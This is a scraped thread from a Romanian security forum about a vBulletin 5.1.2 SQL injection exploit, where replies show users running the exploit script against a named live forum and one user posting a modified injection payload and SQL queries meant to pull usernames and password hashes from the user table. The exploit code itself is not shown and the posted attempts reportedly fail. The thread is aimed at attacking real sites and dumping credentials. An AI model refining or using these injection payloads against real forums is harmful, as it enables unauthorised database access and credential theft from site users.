Jump to content
Nytro

[RST] vBulletin 5.1.2 SQL Injection Exploit

By Nytro, in Exploituri

Recommended Posts

k3nt_black Newbie

k3nt_black

Posted
Posted

test it --> Forums - ????? ??????? ????? ?????

VB= 5.1.2 Vul

php vbnew.php Forums - ????? ??????? ????? ?????

Romanian Security Team - vBulltin 5.1.2 SQL Injection

Version: PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

kkonxy Newbie

kkonxy

Posted
Posted
Is there any protection on the password columns?

select salt from user where userid='1' (works)

select password from user where userid='1' (not works)

Thanks for the exploit nice found :))

How to modify the query to get something more than this ?

'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(concat(username, 0x3a,password) FROM user, 1,1)--+"+' .

'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');

Doesn't work ;-(

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...